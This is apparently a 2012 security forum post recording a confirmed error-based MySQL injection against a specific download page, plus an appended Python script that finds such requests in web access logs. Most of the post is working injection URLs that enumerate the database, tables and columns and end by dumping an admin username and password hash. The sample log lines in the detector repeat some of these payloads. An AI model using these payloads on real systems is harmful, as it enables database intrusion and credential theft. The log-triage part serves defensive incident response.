php+mysql advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and didn't expect to find one here. It can be tested; this is just for the record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate database names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361

/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
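
Added example, not part of the original post: a log-triage sketch that finds requests of the shape recorded above (count(*) + floor(rand(0)*2) + group by) in a web access log and reports which sub-select each one asked for, so a responder can tell what data was exposed. The function names, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# The three pieces that together force MySQL's "Duplicate entry ... for key" error.
CORE = [re.compile(p, re.I) for p in (
    r"count\s*\(\s*\*\s*\)",
    r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)",
    r"group\s+by",
)]
# The sub-select whose value ends up inside the error text.
INNER = re.compile(
    r"concat\s*\(.*?\(\s*select\s+(.+?)\)\s*,\s*(?:0x[0-9a-f]+\s*,\s*)?floor", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def inspect_target(target):
    """Return the requested sub-select if the target matches the pattern, else None."""
    text = unquote_plus(target)  # turn '+' and %XX back into plain characters
    if not all(rx.search(text) for rx in CORE):
        return None
    m = INNER.search(text)
    return m.group(1).strip() if m else "<unparsed>"

def scan(lines):
    """Return (client, status, sub_select) for every matching access-log line."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        leaked = inspect_target(m.group(2))
        if leaked is not None:
            findings.append((m.group(1), int(m.group(3)), leaked))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE_LOG = r"""
192.0.2.10 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 5120
198.51.100.7 - - [13/Sep/2012:17:41:12 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1" 200 812
198.51.100.7 - - [13/Sep/2012:17:43:50 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 200 840
192.0.2.11 - - [13/Sep/2012:17:44:02 +0800] "GET /search?q=group+by+count(*)+example HTTP/1.1" 200 900
""".strip().splitlines()

if __name__ == "__main__":
    for client, status, leaked in scan(SAMPLE_LOG):
        print(f"{client} status={status} requested: {leaked}")
```

Requiring all three core signals together keeps ordinary requests that merely contain "group by" or "count(*)" from alerting.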